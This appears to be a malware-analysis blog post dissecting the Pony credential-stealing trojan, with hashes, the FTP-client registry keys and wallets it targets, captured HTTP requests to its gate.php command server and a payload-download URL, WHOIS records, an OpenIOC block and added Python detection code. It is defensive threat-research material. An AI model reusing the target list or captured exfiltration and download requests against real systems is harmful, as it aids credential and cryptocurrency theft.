Pony Trojan reversing (part-I)

Pony is a stealer Trojan that has been active for quite a while now. It was responsible for stealing over $200,000 in bitcoins (https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/). In this post we will cover the reversing of the Pony Trojan.
Tools required

  1. VMware
  2. IDA Disassembler
  3. OllyDbg Debugger
  4. Hex editor
First, we will examine its behavior under dynamic analysis.
FILE NAME: tt2.exe
FILE SIZE: 209408 bytes
FILE TYPE: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5: 6245899b11a6bd6769b3656943322d13
SHA1: 9879565d8c82e356cb7da62b9f04c3707cd3aac8
SHA256: 15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1
SHA512: 1a0dd9df25e3bd03e80b1563fa13f71f536e353d06cc07ba52f6c40255ace7d13f909e319337e34ce0164a5c1c6c435569b4e3cdba1f02d82425ec42f58cf080
CRC32: 906EA658
SSDEEP: 3072:zGYRxKHi2O9dXvuq+OqUkPdlvWjrcJUVRC169xF5VeOF8x0sk:zRTKHid6OWPdacJUVU6FeOe0D
YARA: None matched
Running it through Cuckoo, we get the following basic details about it, which give us an initial idea of what the malware is doing. It can be summarized as:
  1. Connects out to the network (command and control traffic).
  2. Has an anti-sandbox check (based on a time difference).
  3. Hooks into browsers and reads browser data.
  4. Hides itself in an NTFS alternate data stream (ADS).
Let's look at some of the registry keys it modifies or queries.
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar
HKEY_CURRENT_USER\Software\FlashFXP\3
HKEY_CURRENT_USER\Software\FlashFXP
HKEY_CURRENT_USER\Software\FlashFXP\4
HKEY_LOCAL_MACHINE\Software\FlashFXP\3
HKEY_LOCAL_MACHINE\Software\FlashFXP
HKEY_LOCAL_MACHINE\Software\FlashFXP\4
HKEY_CURRENT_USER\Software\FileZilla
HKEY_CURRENT_USER\Software\FileZilla Client
HKEY_LOCAL_MACHINE\Software\FileZilla
HKEY_LOCAL_MACHINE\Software\FileZilla Client
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options
HKEY_CURRENT_USER\Software\BPFTP
HKEY_CURRENT_USER\Software\TurboFTP
HKEY_LOCAL_MACHINE\Software\TurboFTP
HKEY_CURRENT_USER\Software\Sota\FFFTP
HKEY_CURRENT_USER\Software\Sota\FFFTP\Options
HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Profiles
HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites
HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_CURRENT_USER\Software\Cryer\WebSitePublisher
HKEY_CURRENT_USER\Software\ExpanDrive\Sessions
HKEY_CURRENT_USER\Software\ExpanDrive
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\SOFTWARE\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\SOFTWARE\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\FTPClient\Sites
HKEY_LOCAL_MACHINE\Software\FTPClient\Sites
HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites
HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites
HKEY_CURRENT_USER\SOFTWARE\LeapWare
HKEY_LOCAL_MACHINE\SOFTWARE\LeapWare
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_CURRENT_USER\Software\South River Technologies\WebDrive\Connections
HKEY_LOCAL_MACHINE\Software\South River Technologies\WebDrive\Connections
As you can see, it is evidently looking for stored credentials (the keys above belong to FTP clients). Apart from stored credentials, it also steals bitcoin. Following is the list of software it tries to steal from:
AR Manager | FTPGetter | Pocomail
Total Commander | ALFTP | IncrediMail
WS_FTP | Internet Explorer | The Bat!
CuteFTP | Dreamweaver | Outlook
FlashFXP | DeluxeFTP | Thunderbird
FileZilla | Google Chrome | FastTrackFTP
FTP Commander | Chromium / SRWare Iron | Bitcoin
BulletProof FTP | ChromePlus | Electrum
SmartFTP | Bromium (Yandex Chrome) | MultiBit
TurboFTP | Nichrome | FTP Disk
FFFTP | Comodo Dragon | Litecoin
CoffeeCup FTP / Sitemapper | RockMelt | Namecoin
CoreFTP | K-Meleon | Terracoin
FTP Explorer | Epic | Bitcoin Armory
Frigate3 FTP | Staff-FTP | PPCoin (Peercoin)
SecureFX | AceFTP | Primecoin
UltraFXP | Global Downloader | Feathercoin
FTPRush | FreshFTP | NovaCoin
WebSitePublisher | BlazeFTP | Freicoin
BitKinex | NETFile | Devcoin
ExpanDrive | GoFTP | Frankocoin
ClassicFTP | 3D-FTP | ProtoShares
Fling | Easy FTP | MegaCoin
SoftX | Xftp | Quarkcoin
Directory Opus | FTP Now | Worldcoin
FreeFTP / DirectFTP | Robo-FTP | Infinitecoin
LeapFTP | LinasFTP | Ixcoin
WinSCP | Cyberduck | Anoncoin
32bit FTP | PuTTY | BBQcoin
NetDrive | Notepad++ | Digitalcoin
WebDrive | CoffeeCup Visual Site Designer | Mincoin
FTP Control | FTPShell | Goldcoin
Opera | FTPInfo | Yacoin
WiseFTP | NexusFile | Zetacoin
FTP Voyager | FastStone Browser | Fastcoin
Firefox | CoolNovo | I0coin
FireFTP | WinZip | Tagcoin
SeaMonkey | Yandex.Internet / Ya.Browser | Bytecoin
Flock | MyFTP | Florincoin
Mozilla | sherrod FTP | Phoenixcoin
LeechFTP | NovaFTP | Luckycoin
Odin Secure FTP Expert | Windows Mail | Craftcoin
WinFTP | Windows Live Mail | Junkcoin
FTP Surfer | Becky! |
It copies itself onto the system under a numeric filename, which is then executed through a chain of ShellExecuteEx calls:
FILE NAME: 31780534.exe
FILE SIZE: 317440 bytes
FILE TYPE: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5: 2bd7a3cc81ae70b16b2a85008fb7dd81
SHA1: 7bf35f051a44dc31f0b138e1874e1d75745d49b3
SHA256: 57e38fcc3a641896f351f4bdd7308d7b38b2e9981a8fc7ea5512dfcd8935d856
CRC32: 4AA8F5BD
SSDEEP: 6144:D9mlPaljn+AGwnc6AAech5ppsx7K05mtq1pTOw7/Cr:xm5aZ+MpemzpsdK0m+N7M
YARA: None matched
Not only does Pony steal information, it also downloads other malware from URLs hardcoded in the binary itself:
http://titratresfi.ru/gate.php
POST /gate.php HTTP/1.0
Host: titratresfi.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 270
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http://adishma.com/media/system/shost.exe
GET /media/system/shost.exe HTTP/1.0
Host: adishma.com
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Now let’s look at the network traffic it has generated.
It sends basic information to the command and control server; we will examine this in depth in the second post.
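As an added example (not code from the original post), here is a small Python detector that parses raw HTTP requests like the check-in captured above and flags the traits of the Pony gate POST: a POST to gate.php over HTTP/1.0, an application/octet-stream body with the non-standard Content-Encoding: binary, and the old MSIE 6.0 User-Agent. The sample requests are constructed; the first mirrors the capture, the second is ordinary browser traffic.

```python
from typing import Dict, List, Tuple

# Constructed sample requests: the first mirrors the gate.php check-in captured in this
# post, the second is ordinary browser traffic that must not alert.
SAMPLE_REQUESTS = [
    "POST /gate.php HTTP/1.0\r\nHost: titratresfi.ru\r\nAccept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: 270\r\n"
    "Content-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; "
    ".NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\nAccept: text/html\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/42.0\r\n\r\n",
]


def parse_request(raw: str) -> Tuple[str, str, str, Dict[str, str]]:
    """Split a raw HTTP request into (method, path, version, lower-cased header map)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def pony_checkin_indicators(raw: str) -> List[str]:
    """Return the traits of a Pony gate check-in that the request exhibits."""
    method, path, version, h = parse_request(raw)
    ua = h.get("user-agent", "")
    hits = []
    if method == "POST" and path.endswith("/gate.php"):
        hits.append("post_to_gate_php")
    if version == "HTTP/1.0":  # modern browsers send HTTP/1.1 or newer
        hits.append("http_1_0")
    if h.get("content-type") == "application/octet-stream":
        hits.append("octet_stream_body")
    if h.get("content-encoding", "").lower() == "binary":  # not a registered encoding
        hits.append("content_encoding_binary")
    if "MSIE 6.0" in ua and "InfoPath.2" in ua:  # hard-coded, long-obsolete UA string
        hits.append("legacy_msie6_ua")
    return hits


def is_pony_checkin(raw: str, min_hits: int = 4) -> bool:
    """Alert when at least min_hits of the five traits are present together."""
    return len(pony_checkin_indicators(raw)) >= min_hits
```

Requiring four of the five traits keeps a lone HTTP/1.0 request or a stale User-Agent from alerting on its own.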
Network information
domain: TITRATRESFI.RU
nserver: ns1.entrydns.net.
nserver: ns2.entrydns.net.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
registrar: R01-RU
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2015.11.09
paid-till: 2016.11.09
free-date: 2016.12.10
source: TCI
Last updated on 2015.11.15 16:16:33 MSK
Domain Name: ADISHMA.COM
Registrar: PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Sponsoring Registrar IANA ID: 303
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: NS1.SOFTONETECHNOLOGIES.COM
Name Server: NS2.SOFTONETECHNOLOGIES.COM
Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Updated Date: 07-sep-2015
Creation Date: 26-dec-2014
Expiration Date: 26-dec-2015
IOC
<Indicator id="aae1b2d0-a5ad-471a-8c48-2296f6cfb49e" operator="OR">
  <IndicatorItem condition="is" id="b1984833-80fe-446b-a3d8-3349822f6336">
    <Context document="FileItem" search="FileItem/Md5sum" type="mir"/>
    <Content type="md5">6245899b11a6bd6769b3656943322d13</Content>
  </IndicatorItem>
  <IndicatorItem condition="is" id="e2168e97-5db8-4432-b498-8a5973deeb42">
    <Context document="FileItem" search="FileItem/Sha1sum" type="mir"/>
    <Content type="sha1">9879565d8c82e356cb7da62b9f04c3707cd3aac8</Content>
  </IndicatorItem>
  <IndicatorItem condition="is" id="f66fb3f0-1178-4638-bf06-24d131cfd2c7">
    <Context document="FileItem" search="FileItem/Sha256sum" type="mir"/>
    <Content type="sha256">15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content>
  </IndicatorItem>
  <Indicator id="81c75ab7-69b2-434d-808f-607a5b283cec" operator="AND">
    <IndicatorItem condition="is" id="bb45ed4b-823c-41d0-8831-0ab41c874a7f">
      <Context document="FileItem" search="FileItem/FileName" type="mir"/>
      <Content type="string">Centrylink</Content>
    </IndicatorItem>
    <IndicatorItem condition="is" id="9194b695-6af4-428f-b2cf-3a40c2560e78">
      <Context document="FileItem" search="FileItem/SizeInBytes" type="mir"/>
      <Content type="int">209408</Content>
    </IndicatorItem>
    <IndicatorItem condition="is" id="010608b2-0016-426d-9dce-2e9ad855f786">
      <Context document="FileItem" search="FileItem/PEInfo/PETimeStamp" type="mir"/>
      <Content type="date">2015-11-12T09:49:00Z</Content>
    </IndicatorItem>
  </Indicator>
</Indicator>
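As an added example, not part of the original post, the following Python evaluator parses an OpenIOC fragment and tests it against file attributes, honouring the OR/AND nesting above. The embedded XML is constructed from the indicators listed here (the SHA1 and PETimeStamp items are left out to keep it short), and the file attributes it is tested with are constructed samples.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constructed from this post's indicators: an OR over file hashes, plus a nested AND over name and size.
PONY_IOC = """<Indicator id="aae1b2d0-a5ad-471a-8c48-2296f6cfb49e" operator="OR">
  <IndicatorItem condition="is" id="b1984833-80fe-446b-a3d8-3349822f6336">
    <Context document="FileItem" search="FileItem/Md5sum" type="mir"/>
    <Content type="md5">6245899b11a6bd6769b3656943322d13</Content>
  </IndicatorItem>
  <IndicatorItem condition="is" id="f66fb3f0-1178-4638-bf06-24d131cfd2c7">
    <Context document="FileItem" search="FileItem/Sha256sum" type="mir"/>
    <Content type="sha256">15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</Content>
  </IndicatorItem>
  <Indicator id="81c75ab7-69b2-434d-808f-607a5b283cec" operator="AND">
    <IndicatorItem condition="is" id="bb45ed4b-823c-41d0-8831-0ab41c874a7f">
      <Context document="FileItem" search="FileItem/FileName" type="mir"/>
      <Content type="string">Centrylink</Content>
    </IndicatorItem>
    <IndicatorItem condition="is" id="9194b695-6af4-428f-b2cf-3a40c2560e78">
      <Context document="FileItem" search="FileItem/SizeInBytes" type="mir"/>
      <Content type="int">209408</Content>
    </IndicatorItem>
  </Indicator>
</Indicator>"""

def file_item(data: bytes, name: str) -> dict:
    """Attributes of a file keyed by the FileItem/... terms an OpenIOC Context refers to."""
    return {
        "FileItem/Md5sum": hashlib.md5(data).hexdigest(),
        "FileItem/Sha256sum": hashlib.sha256(data).hexdigest(),
        "FileItem/FileName": name,
        "FileItem/SizeInBytes": str(len(data)),
    }

def evaluate(node: ET.Element, item: dict) -> bool:
    """Recursively evaluate an Indicator (AND/OR) or a leaf IndicatorItem against item."""
    if node.tag == "IndicatorItem":
        term = node.find("Context").get("search")
        expected = node.find("Content").text.strip().lower()
        actual = item.get(term, "").lower()  # a term the file lacks never matches
        if node.get("condition") == "contains":
            return expected in actual
        return actual == expected  # condition "is"
    results = [evaluate(child, item) for child in node]
    return all(results) if node.get("operator") == "AND" else any(results)

def match_attributes(item: dict) -> bool:
    """True when the file attributes satisfy the Pony IOC."""
    return evaluate(ET.fromstring(PONY_IOC), item)
```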
Using VirusTotal, we can map other files that use the same location to download additional malware.
Dhirendra Biswal
